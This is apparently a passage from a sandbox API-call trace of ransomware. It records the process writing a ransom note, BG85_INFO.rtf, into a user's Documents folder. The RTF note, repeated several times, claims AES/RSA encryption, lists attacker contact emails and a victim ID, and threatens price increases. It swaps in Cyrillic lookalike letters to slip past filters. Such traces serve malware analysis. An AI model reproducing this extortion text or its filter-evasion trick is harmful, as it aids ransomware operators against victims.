\\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0068.010] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0068.012] CloseHandle (hObject=0x1cc) returned 1 [0068.012] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\bg85_info.rtf")) returned 0xffffffff [0068.012] GetLastError () returned 0x2 [0068.012] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vLykOV4Y_3l2VkIHp\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vlykov4y_3l2vkihp\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0068.016] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 